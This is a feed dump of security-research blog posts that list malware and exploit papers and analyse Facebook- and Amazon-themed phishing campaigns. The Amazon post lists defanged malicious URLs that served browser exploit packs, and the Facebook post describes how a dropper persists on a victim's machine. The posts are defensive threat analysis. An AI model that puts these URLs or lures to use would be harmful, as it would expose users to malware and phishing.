Understanding the underground economy's structure is critical for fighting
it."</span><br />
<div class="MsoNormal">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; line-height: 115%;">Its available here: <b><a href="http://www.computer.org/csdl/mags/ic/2013/01/mic2013010060-abs.html" target="_blank">http://www.computer.org/csdl/mags/ic/2013/01/mic2013010060-abs.html</a>.</b></span></div>
<div class="MsoNormal">
<br /></div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-32661698982354323132013-01-27T16:58:00.002-08:002013-01-27T21:25:35.616-08:00Hack In The Box (HitB) Magazine : A Journey of Learning and Sharing<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tr84K88rrQ8/UQXJO2PGY9I/AAAAAAAABZQ/JphiqP2vhgA/s1600/hitb_mag.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="86" src="http://4.bp.blogspot.com/-tr84K88rrQ8/UQXJO2PGY9I/AAAAAAAABZQ/JphiqP2vhgA/s400/hitb_mag.png" width="400" /></a></div>
I finally get some time to talk my ( and other team members) journey as a contributor and author for Hack-in-the-Box (HitB) magazine. At this point, HitB ezine has completed more than two years. It's been a great time working with the HitB crew especially <b>Zarul </b>and <b>Dhillon.</b> In addition, Mateusz “j00ru” Jurczyk<br />
Gynvael Coldwind is also contributing a lot. I have been writing for this magazine right from the first edition. It has been a great time of sharing and learning in the last two years. I want to talk about the content that I have written in the last nine editions with a support from my different colleagues.<br />
<br />
<b>Edition 1: (Paper) - Malware Obfuscation: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-001.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-001.pdf</a> - </b>The first edition was released in January 2010. In this edition, I wrote a paper with Wayne Huang of Armorize on malware obfuscation tactics with an additional support from Fyodor Yarochkin. We discussed several malware obfuscation tactics and how to deobfuscate them manually.<br />
<br />
<b>Edition 2: (Paper) - Open Redirect Wreck Off - Web Traffic Forwards: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf</a> - </b>The second edition was released in April 2012<b>. </b>In this edition, I presented the complete details of traffic redirection in web applications and websites using real time code snippets collected during open research.<br />
<br />
<b>Edition 3: (Paper) - Chinese Malware Factory - Paradox of MS Office Based Malware: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-003.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-003.pdf</a> - </b>The third edition came out in July 2010. In this edition, I wrote about my research on MS office based Chinese malware that uses word, excel, etc. files to spread malicious code by exploiting inherent vulnerabilities in the requisite software component. <b> </b><br />
<b><br /></b>
<b>Edition 4: (Paper) - Notorious Data-center Support Systems: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-004.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-004.pdf</a> - </b>The fourth edition came out in October 2010. In this edition. I wrote a collaborative paper with my colleague Rohit Bansal on vulnerabilities present in the support center web applications that can directly result in gaining access to different virtual hosts.<br />
<br />
<b>Edition 5: (Paper) - Exploiting Web Virtual Hosting - Malware Infections: </b><a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-005.pdf" style="font-weight: bold;">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-005.pdf</a><b> - </b>The fifth edition was released in February 2011. In this paper, I wrote a paper collaboratively with my colleague Rohit Bansal and my adviser Dr. Enbody and presented about the techniques of infecting virtual hosts present on the same host.<br />
<br />
<b>Edition 6: (Paper) - Botnet Resistant Coding: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-006.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-006.pdf</a> -</b> The sixth edition came out in June 2011. I released a paper with my colleagues Peter Greko, Fabian and my adviser Dr. Enbody to present on the concept of botnet resistant coding. In this edition, we talk about a generic approach of coding to subvert the automated log harvesting process in C&C panels.<br />
<br />
<b>Edition 7: (Paper) - Extending SQL Injections using Buffer Overflows: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-007.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-007.pdf</a> - </b>The seventh edition was released in October 2011. In this edition, I wrote another paper collaboratively with my colleague Rohit Bansal and my adviser Dr. Enbody on the issue of exploiting blind sql injections in web applications that encounter 500 error by using buffer overflow technique. This tactic was developed by Rohit itself.<br />
<br />
<b>Edition 8: (Paper) - Exploit Distribution Mechanism in Browser Exploit Packs: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-008.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-008.pdf</a> - </b>The eighth edition came out in April 2012. In this edition, I wrote collaboratively with Dr. Enbody on the techniques of exploit distribution in browser exploit packs such as BlackHole, Phoenix, etc.<br />
<br />
<b>Edition 9: (Paper) - Game of Windows 32/64 System Takeover - Bot Wars : <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf">http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf</a> - </b>The ninth edition was released in November 2012. I detailed on the concept of bot wars in which one bot kills other to gain complete access of the infected system.<br />
<b><br /></b>
HitB Magazine is a great place to talk about hacking techniques. I hope this continues and I wish to contribute more in the coming time.<br />
<br />
<b>So, Hack the Box. Cheers ! </b>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-73865597093351181232013-01-09T09:17:00.001-08:002013-01-09T09:17:03.663-08:00Virus Bulletin Papers Added to RespositoryWe have added the papers to our repository. The newly added ones are:<br />
<br />
1. ICE IX Analysis: <a href="http://secniche.org/released/VB_ICE_IX.pdf" target="_blank"><b>http://secniche.org/released/VB_ICE_IX.pdf</b></a><br />
<br />
2. Winlocker Ransomware Analysis: <b><a href="http://secniche.org/released/VB_WINLOCKER.pdf" target="_blank">http://secniche.org/released/VB_WINLOCKER.pdf</a></b><br />
<br />
3. Malware Strategies - Part 1: <a href="http://secniche.org/released/VB_MAL_DET_STR_PART1.pdf" target="_blank"><b>http://secniche.org/released/VB_MAL_DET_STR_PART1.pdf</b></a><br />
<br />
4. Malware Strategies - Part 2: <b><a href="http://secniche.org/released/VB_MAL_DET_STR_PART2.pdf" target="_blank">http://secniche.org/released/VB_MAL_DET_STR_PART2.pdf</a></b><br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-6353127993176679392013-01-09T08:12:00.002-08:002014-03-29T14:06:38.138-07:00Elsevier Network Security : Abusing Glype Proxies <div class="separator" style="clear: both; text-align: center;">
<a href="http://ars.els-cdn.com/content/image/1-s2.0-S1353485812X70120-cov150h.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://ars.els-cdn.com/content/image/1-s2.0-S1353485812X70120-cov150h.gif" /></a></div>
<b>Update : 29th April 2014</b><br />
<b><br /></b>
<b>Download : Paper available here</b>: <a href="http://www.slideshare.net/adityaks/abusing-glype-proxies-exploits-and-defences" target="_blank"><b>http://www.slideshare.net/adityaks/abusing-glype-proxies-exploits-and-defences</b></a><br />
<br />
Our paper on "Abusing Glype Proxies: Attacks, Exploits and Defenses" are out in Elsevier Network Security.<br />
<br />
Abstract: <span style="background-color: white; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; text-align: justify; word-spacing: -0.15ex;">Proxies play a critical privacy role because these are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.</span><br />
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
The Glype open-source HTTP proxy is used extensively. However, proxies can be transformed into attack platforms for exploitation. </div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
<br /></div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
Fetch: <b><a href="http://www.sciencedirect.com/science/article/pii/S1353485812701125" target="_blank">http://www.sciencedirect.com/science/article/pii/S1353485812701125</a>.</b></div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
<br /></div>
<div id="spara50" style="background-color: white; border: 0px; color: #2e2e2e; font-family: 'Arial Unicode MS', 'Arial Unicode', Arial, 'URW Gothic L', Helvetica, Tahoma, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 9px; padding: 0px; text-align: justify; vertical-align: baseline; word-spacing: -0.15ex;">
Enjoy!</div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-83984981635513081832012-12-02T07:19:00.000-08:002012-12-02T07:19:19.253-08:00HITB EZine : Bot Wars - The Game of Win32/64 TakeOver<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://magazine.hackinthebox.org/images/hitb-magazinecover.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://magazine.hackinthebox.org/images/hitb-magazinecover.jpg" width="148" /></a></div>
Botnets have been in existence for years. Third Generation Botnets (TGB’s) use sophisticated attack vectors to infect users at a large scale. Botnets are cyber weapons that can jeopardize the integrity and security of the critical infrastructure on the Internet. There is an insidious war going among different generations’ of botnets to exploit the target systems. This concept is termed as bot wars. This article explores the details of bot wars and how the bots kill each other to control the infected systems.<br />
<br />
The paper is out in the 9th edition of HITB Ezine. Fetch the magazine from here: <a href="http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf" target="_blank"><b>http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-009.pdf</b></a><br />
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-31764861208260241572012-10-10T09:14:00.000-07:002013-04-01T16:36:02.463-07:00Attribution - Team Cyberthack and The Game of Facebook Phishing Attack - Tracking Back<div class="separator" style="clear: both; text-align: left;">
This Facebook case study is an interesting one and based on the ongoing Facebook phishing attack leading to malware. Interestingly, the attack seems to be launched by the Indonesian and Spanish hackers considering the languages used in the deployed code. Our team came across a Facebook phishing email embedded with a video and other malicious links. Every single URL pointed to a same domain. The Facebook message embedded in the email carried a notification message that says something as follows:</div>
<br />
<i>""Miiiii lindoooo! Ahahahaha this videoo muestrezzz not what to nadiesss = $ $ $ $ ZIII? Tiii is for! Because? Yoooo muxiiiisisisisizimoooo amoooo you! Muxo like me will I require your videooo montonezzzz!! porfiz when estez at ............ "Read more </i><i><b>This video was ranked No one under 18</b>." </i><br />
<br />
The original message is presented below:<br />
<br />
<i>"Miiiii lindoooo!!! ahahahaha este videoo no se lo muestrezzz a nadiesss =$$$$ ziii ?? es solo para tiii!! porque ? yoooo te amoooo muxiiiisisisisizimoooo!!! me gusto muxo tu videooo te requiero montonezzzz!!!! porfiz cuando estez en. ..... . ....." Leer mas</i><br />
<br />
<i>Este video fue clasificado Prohibido para menores de 18 años .</i><br />
<i><br /></i>
The phishing email was structured like as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-qxw5Flia9bk/UHWNTo2BteI/AAAAAAAABTo/lfBqpFPayZU/s1600/facebook_phishing_video_email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="http://4.bp.blogspot.com/-qxw5Flia9bk/UHWNTo2BteI/AAAAAAAABTo/lfBqpFPayZU/s400/facebook_phishing_video_email.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Before looking into the kind of malware served by this phishing attack, let's dissect the other relevant information gathered from this malicious domain. The facts are discussed as follows:</div>
<br />
1. The domain was compromised by the Cyberthack Team.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-EfbxppDq1VE/UHWPZc-vbvI/AAAAAAAABTw/OEqSN17vOHs/s1600/team_cyberthack_phishing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="http://3.bp.blogspot.com/-EfbxppDq1VE/UHWPZc-vbvI/AAAAAAAABTw/OEqSN17vOHs/s400/team_cyberthack_phishing.png" width="400" /></a></div>
<br />
2. On analyzing further, we got an information that was embedded somewhere in the web pages about the profile of a user. We cannot say this profile is legitimate or fake at this point of time but, it is worthwhile to look into this. The profile is presented below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-MQUIjJpyLas/UHWQQo6ebQI/AAAAAAAABT4/01Qt4q9yD4I/s1600/team_cyberthack_phishing_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://3.bp.blogspot.com/-MQUIjJpyLas/UHWQQo6ebQI/AAAAAAAABT4/01Qt4q9yD4I/s400/team_cyberthack_phishing_2.png" width="400" /></a></div>
<br />
3. Some of the JavaScripts that are used in this malware domain are taken from the - <a href="http://cirebon-cyber4rt.blogspot.com/" target="_blank">http://cirebon-cyber4rt.blogspot.com/</a>. Guys, tt is always good to remove the comments when you are doing this kind of job.<br />
<br />
4. Again, a configuration flaw in the web server running on this malicious domain allowed us to access the<br />
a custom statistics page that pointed out the visitors visiting that link. It is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-3-cSElWtCEo/UHWUbcEFwGI/AAAAAAAABUQ/l5zTlBgGhSY/s1600/team_cyberthack_phishing_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="http://3.bp.blogspot.com/-3-cSElWtCEo/UHWUbcEFwGI/AAAAAAAABUQ/l5zTlBgGhSY/s400/team_cyberthack_phishing_5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The language used in this page is Spanish. It is easy to decipher the number of visitors that visited this page</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. The malicious link downloaded facebook.exe executable on the victim machine. Some of the facts</div>
<div class="separator" style="clear: both; text-align: left;">
are listed below:</div>
<div class="separator" style="clear: both; text-align: left;">
5.1 The malicious program is written in Visual Basic.</div>
<div class="separator" style="clear: both; text-align: left;">
5.2 No packer is used to pack the critical sections. No code obfuscation is used.</div>
<div class="separator" style="clear: both; text-align: left;">
5.3 The malicious program used a reference to TortoiseBlame -<a href="http://tortoisesvn.tigris.org/blame.html" target="_blank">http://tortoisesvn.tigris.org/blame.html</a>. </div>
<div class="separator" style="clear: both; text-align: left;">
It seems like the malware tries to look legitimate.</div>
<div class="separator" style="clear: both; text-align: left;">
5.4 The malware executes silently in the system and on successful installation, opens facebook.com web </div>
<div class="separator" style="clear: both; text-align: left;">
page.</div>
<div class="separator" style="clear: both; text-align: left;">
5.5 The malware creates wincal.exe in the %systemroot% folder and uses registry to load it. It is again a </div>
<div class="separator" style="clear: both; text-align: left;">
Visual Basic file. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For additional check, the virus total analysis is here: <a href="https://www.virustotal.com/file/a64c6d344626ca983979042485a2b8b271ae08f1e411511227700591c2418ac1/analysis/" target="_blank">https://www.virustotal.com/file/a64c6d344626ca983979042485a2b8b271ae08f1e411511227700591c2418ac1/analysis/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Stay secure. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Note: This attack is still active.</div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-11839843959302502802012-09-20T20:54:00.002-07:002013-02-12T06:14:06.842-08:00Did You Order HDTV from Amazon? - Yes | No, Phishers Targeting Amazon Brand !The concept is the same so as the attack. This time attackers are using Amazon brand to spread infections on the Internet. The phishing email is drafted really well and shows that an order of ne product (HDTV) has been processed. The email looks like as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-dmENS3OtUJ8/UFvgvSDDBYI/AAAAAAAABS4/jpLgWPlYFhY/s1600/amazon_phishing_email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://2.bp.blogspot.com/-dmENS3OtUJ8/UFvgvSDDBYI/AAAAAAAABS4/jpLgWPlYFhY/s640/amazon_phishing_email.png" width="640" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The browser is redirected to the web page showing the notification as follows:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Aq0fE9Ot3lo/UFvg_4BUpCI/AAAAAAAABTA/W7qMFXsjYds/s1600/amazon_phishing_email_note_.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="http://4.bp.blogspot.com/-Aq0fE9Ot3lo/UFvg_4BUpCI/AAAAAAAABTA/W7qMFXsjYds/s640/amazon_phishing_email_note_.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The script looks like as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-mjKY4bOt9Pg/UFvhv84vsNI/AAAAAAAABTI/4JA0kg9LM-I/s1600/amazon_phishing_email1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="http://2.bp.blogspot.com/-mjKY4bOt9Pg/UFvhv84vsNI/AAAAAAAABTI/4JA0kg9LM-I/s640/amazon_phishing_email1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The deobfuscation results in the following code.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oaBt0aB-_kQ/UFvihC-MQdI/AAAAAAAABTQ/Ixbq6JtroPY/s1600/amazon_phishing_email2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://3.bp.blogspot.com/-oaBt0aB-_kQ/UFvihC-MQdI/AAAAAAAABTQ/Ixbq6JtroPY/s640/amazon_phishing_email2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Again, the iframe loads content from third-party domain hosting Browser Exploit Pack (BEP). The interesting fact is that, we received a number of emails within a span of time. Every new phishing email has a new embedded URL as follows:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
hxxp://shuraki.com/wp-admin/hdtvamazon.html [WordPress]</div>
<div class="separator" style="clear: both; text-align: left;">
hxxp://swishmedia.ca/clients/amazinhdtv.html [Generic]</div>
<div class="separator" style="clear: both; text-align: left;">
hxxp://tainguyenso.com/admincp/amazinhdtv.html [V Bulletin]</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
These emails look very genuine and authentic. It is highly advised that to be paranoid and think twice before interacting with these emails.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Check previous post about LinkedIn Phishing Attack - <a href="http://secniche.blogspot.com/2012/08/linekedin-invitation-phishing-blackhole.htmlhttp://secniche.blogspot.com/2012/08/linekedin-invitation-phishing-blackhole.html" target="_blank">http://secniche.blogspot.com/2012/08/linekedin-invitation-phishing-blackhole.htmlhttp://secniche.blogspot.com/2012/08/linekedin-invitation-phishing-blackhole.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com